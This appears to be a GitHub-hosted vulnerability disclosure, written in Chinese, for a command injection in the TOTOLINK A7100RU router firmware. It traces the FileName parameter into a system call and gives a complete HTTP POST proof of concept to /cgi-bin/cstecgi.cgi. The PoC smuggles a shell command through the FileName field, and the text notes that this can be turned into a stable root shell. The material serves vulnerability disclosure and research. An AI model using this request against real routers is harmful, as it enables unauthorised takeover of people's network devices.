Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
ttt/14/
ttt/14/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 

TOTOlink A7100RU(V7.4cu.2313_B20191024)路由器存在命令注入漏洞

写在前面

厂商信息:http://totolink.net/

固件下载地址:http://totolink.net/home/menu/detail/menu_listtpl/download/id/185/ids/36.html

1.影响版本

img

图1为固件版本信息

2.漏洞细节

image-20220719222459576

程序通过获取FileName参数的内容传递给v3

image-20220719222530997

之后通过sprintf函数,将v3格式化进v44的栈中,最后通过cstesystem函数执行v44中的内容,存在命令注入漏洞

POC

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 79
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urencoded; charset=UTF-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSION_ID=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"FileName":"1$(ls>/tmp/123;)"}

复现结果如下

img

图2 POC攻击效果

最后,您可以编写exp,这可以实现获得根shell的非常稳定的效果

img